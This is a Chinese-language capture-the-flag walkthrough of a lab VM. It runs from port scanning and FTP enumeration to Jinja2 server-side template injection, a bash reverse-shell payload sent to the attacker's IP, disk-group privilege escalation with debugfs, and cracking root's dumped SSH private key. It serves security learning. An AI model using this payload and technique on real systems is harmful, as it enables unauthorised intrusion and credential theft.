信息收集

服务探测

开放四个端口，有个ftp

❯ sudo arp-scan -l
❯ sudo arp-scan -l
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.134  08:00:27:4b:15:37       (Unknown)
192.168.60.254  00:50:56:fd:82:05       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.973 seconds (129.75 hosts/sec). 4 responded
❯ export ip=192.168.60.134
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.134:22
Open 192.168.60.134:21
Open 192.168.60.134:80
Open 192.168.60.134:5000
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 22:25 CST
Initiating ARP Ping Scan at 22:25
Scanning 192.168.60.134 [1 port]
Completed ARP Ping Scan at 22:25, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:25
Completed Parallel DNS resolution of 1 host. at 22:25, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 22:25
Scanning 192.168.60.134 [4 ports]
Discovered open port 80/tcp on 192.168.60.134
Discovered open port 5000/tcp on 192.168.60.134
Discovered open port 22/tcp on 192.168.60.134
Discovered open port 21/tcp on 192.168.60.134
Completed SYN Stealth Scan at 22:25, 0.03s elapsed (4 total ports)
Nmap scan report for 192.168.60.134
Host is up, received arp-response (0.00036s latency).
Scanned at 2025-01-03 22:25:38 CST for 0s

PORT     STATE SERVICE REASON
21/tcp   open  ftp     syn-ack ttl 64
22/tcp   open  ssh     syn-ack ttl 64
80/tcp   open  http    syn-ack ttl 64
5000/tcp open  upnp    syn-ack ttl 64
MAC Address: 08:00:27:4B:15:37 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
           Raw packets sent: 5 (204B) | Rcvd: 5 (204B)

先看看80端口吧

扫了一下目录

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.134
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 317] [--> http://192.168.60.134/assets/]
/forms                (Status: 301) [Size: 316] [--> http://192.168.60.134/forms/]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.60.134/javascript/]
/server-status        (Status: 403) [Size: 279]
Progress: 207643 / 207644 (100.00%)
===============================================================

尝试在网页上寻找突破口

首页有个联系我们的功能，不过没法发送，好像是有个库没导入吧

Ftp枚举

在ftp中用匿名用户登入发现有个提示

❯ ftp  anonymous@$ip
Connected to 192.168.60.134.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||28025|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              34 May 16  2024 supermegaultraimportantebro.txt
226 Directory send OK.
ftp> get supermegaultraimportantebro.txt
local: supermegaultraimportantebro.txt remote: supermegaultraimportantebro.txt
229 Entering Extended Passive Mode (|||14829|)
150 Opening BINARY mode data connection for supermegaultraimportantebro.txt (34 bytes).
100% |*********************************************************************************************************|    34       15.67 KiB/s    00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (9.91 KiB/s)
❯ cat supermegaultraimportantebro.txt
Gracias por venir, ahora vayase!!
谢谢您的光临，现在请离开！

尝试访问一下5000端口，发现只有一张采油的图片，wget下来

图片足足有12MB，这么大

❯ curl 192.168.60.134:5000
<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>¡Mi Página Web!</title>
    <style>
        html, body {
            margin: 0;
            padding: 0;
            height: 100%;
            overflow: hidden;
        }
        img {
            width: 100%;
            height: 100%;
            object-fit: cover; /* Para asegurarse de que la imagen cubra todo el espacio */
        }
    </style>
</head>
<body>
    <img   src="/static/imagen.jpg"  alt="Descripción de la imagen">
</body>
</html>

<!-- /petrolhead -->%

看了一下exif信息，分辨率4k左右，难怪这么大

❯ wget http://192.168.60.134:5000/static/imagen.jpg
--2025-01-03 22:35:28--  http://192.168.60.134:5000/static/imagen.jpg
Connecting to 192.168.60.134:5000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 323729 (316K) [image/jpeg]
Saving to: ‘imagen.jpg’

imagen.jpg                            100%[=======================================================================>] 316.14K  --.-KB/s    in 0.03s

2025-01-03 22:35:28 (12.1 MB/s) - ‘imagen.jpg’ saved [323729/323729]
❯ exiftool imagen.jpg
ExifTool Version Number         : 13.00
File Name                       : imagen.jpg
Directory                       : .
File Size                       : 324 kB
File Modification Date/Time     : 2024:05:16 15:10:41+08:00
File Access Date/Time           : 2025:01:03 22:35:28+08:00
File Inode Change Date/Time     : 2025:01:03 22:35:28+08:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.02
Resolution Unit                 : inches
X Resolution                    : 72
Y Resolution                    : 72
Profile CMM Type                : Linotronic
Profile Version                 : 2.1.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 1998:02:09 06:49:00
Profile File Signature          : acsp
Primary Platform                : Microsoft Corporation
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             : Hewlett-Packard
Device Model                    : sRGB
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Perceptual
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 : Hewlett-Packard
Profile ID                      : 0
Profile Copyright               : Copyright (c) 1998 Hewlett-Packard Company
Profile Description             : sRGB IEC61966-2.1
Media White Point               : 0.95045 1 1.08905
Media Black Point               : 0 0 0
Red Matrix Column               : 0.43607 0.22249 0.01392
Green Matrix Column             : 0.38515 0.71687 0.09708
Blue Matrix Column              : 0.14307 0.06061 0.7141
Device Mfg Desc                 : IEC http://www.iec.ch
Device Model Desc               : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc               : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant         : 19.6445 20.3718 16.8089
Viewing Cond Surround           : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type    : D50
Luminance                       : 76.03647 80 87.12462
Measurement Observer            : CIE 1931
Measurement Backing             : 0 0 0
Measurement Geometry            : Unknown
Measurement Flare               : 0.999%
Measurement Illuminant          : D65
Technology                      : Cathode Ray Tube Display
Red Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)
Image Width                     : 3626
Image Height                    : 2479
Encoding Process                : Progressive DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 3626x2479
Megapixels                      : 9.0

SSTI注入

上面curl的时候忽略了最下面一行注释了，/petrolhead，有个目录提示给我们

我尝试命令注入，失败了

卡在这，看了其他师傅的WP，了解到这是SSTI注入，具体可以参考下面链接

SSTI（Server Side Template Injection）- HackTricks — SSTI (Server Side Template Injection) - HackTricks

Hackmanit/TInjA：TInjA 是一种 CLI 工具，用于测试网页的模板注入漏洞，并支持 8 种不同编程语言的 44 个最相关的模板引擎。

我们利用TInjA识别到这是一个python的Jinja2/Jinja2

❯ ./tinja url -u  http://192.168.60.134:5000/petrolhead -d "user_input="
TInjA v1.1.4 started at 2025-01-03_23-11-13

Analyzing URL(1/1): http://192.168.60.134:5000/petrolhead
===============================================================
Status code 200
Analyzing post parameter  user_input  =>  {{1*2}}
[*] Value  SOHBMVCMULIJPZGB  of POST parameter  user_input  is being reflected 1 time(s) in the response body

[!] The polyglot <%'${{/#{@}}%>{{ triggered an error: Status Code 500
[!] The polyglot p ">[[${{1}}]] was rendered in a modified way: [p ">[[$1]]]
[*] The polyglot p ">[[${{1}}]] returned the response(s) [p ">[[$1]]]
[*] The polyglot <%=1%>@*#{1} returned the response(s) [unmodified]
[!] The polyglot {##}/*{{.}}*/ triggered an error: Status Code 500

A template injection was detected and the template engine is now being identified.
[!] The polyglot <%{{#{%>} triggered an error: Status Code 500
[!] The polyglot <%=1%>#{2}{{a}} was rendered in a modified way: [<%=1%>#{2}]
[*] The polyglot <%=1%>#{2}{{a}} returned the response(s) [<%=1%>#{2}]
[!] The polyglot //*<!--{##<%=1%>{{!--{{1}}--}}-->*/#} was rendered in a modified way: [//*<!--]
[*] The polyglot //*<!--{##<%=1%>{{!--{{1}}--}}-->*/#} returned the response(s) [//*<!--]
[!] The polyglot {{/}} triggered an error: Status Code 500
[!] The polyglot {{1in[1]}} was rendered in a modified way: [True]
[*] The polyglot {{1in[1]}} returned the response(s) [True]

Verifying the template injection by issuing template expressions tailored to the specific template engine.
[*] Verifying Jinja2/Jinja2 (Sandbox).
[*] The polyglot {{ 7*7 }} returned the response(s) [49]
[+] Jinja2/Jinja2 (Sandbox) was identified (certainty: Very High)

===============================================================

Successfully finished the scan
[+] Suspected template injections: 1
[+] 1 Very High, 0 High, 0 Medium, 0 Low, 0 Very Low certainty

Duration: 89.504144ms
Average polyglots sent per user input: 9

在Github上找到其Payload

[PayloadsAllTheThings/Server Side Template Injection/Python.md at master · swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server Side Template Injection/Python.md#exploit-the-ssti-by-calling-ospopenread)

尝试能否正常读取

用户提权

可以的，利用其他下面的payload反弹Shell

1	{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('bash -c \'bash -i >& /dev/tcp/192.168.60.100/1234 0>&1\'').read() }}

kali上监听一下1234端口

❯ pwncat-cs -lp 1234
[23:42:20] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[23:42:21] received connection from 192.168.60.134:46220                                                                                    bind.py:84
[23:42:22] 192.168.60.134:46220: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) tcuser@SinPLomo98:/home/tcuser/prueba$ id
uid=1000(tcuser) gid=1000(tcuser) grupos=1000(tcuser),6(disk),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev)

Disk组利用

我们可以观察到这个用户隶属于disk组中，可以在下面文章中找到提权利用

[Interesting Groups - Linux Privesc - HackTricks](https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html?highlight=disk gourp#disk-group)

可以直接进行文件读取，这样就直接拿flag了

(remote) tcuser@SinPLomo98:/home/tcuser$ df -h
S.ficheros     Tamaño Usados  Disp Uso% Montado en
udev             962M      0  962M   0% /dev
tmpfs            197M   524K  197M   1% /run
/dev/sda1         19G   2,4G   16G  14% /
tmpfs            984M      0  984M   0% /dev/shm
tmpfs            5,0M      0  5,0M   0% /run/lock
(remote) tcuser@SinPLomo98:/home/tcuser$ debugfs -w /dev/sda1
debugfs 1.47.0 (5-Feb-2023)
debugfs:  cat /home/tcuser/user.txt
aa3b5421f267d0bec5b0e72cb638187b
debugfs:  cat /root/root.txt
6d75e57572638098039f7fbb6fd39b70
debugfs:quit

拿到私钥文件，你也可以进一步的去登入拿到root

debugfs:  cat /root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
2ZOJdg==
-----END OPENSSH PRIVATE KEY-----
❯ vim id_rsa
❯ ssh2john id_rsa >hash
❯ john hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
angels1          (id_rsa)
1g 0:00:08:51 DONE 2/3 (2025-01-04 00:15) 0.001882g/s 43.56p/s 43.56c/s 43.56C/s active1..ashton1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
❯ ssh [email protected] -i id_rsa
The authenticity of host '192.168.60.134 (192.168.60.134)' can't be established.
ED25519 key fingerprint is SHA256:F3OjFFzQXiCaifa+reryaJCdnjPukFzPeXTCI70bZqI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.134' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Linux SinPLomo98 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu May 16 16:49:15 2024 from 192.168.0.108
root@SinPLomo98:~# cat root.txt
6d75e57572638098039f7fbb6fd39b70
root@SinPLomo98:~# id
uid=0(root) gid=0(root) grupos=0(root)

还要爆破一下私钥，太麻烦，直接拿flag就完事了🥱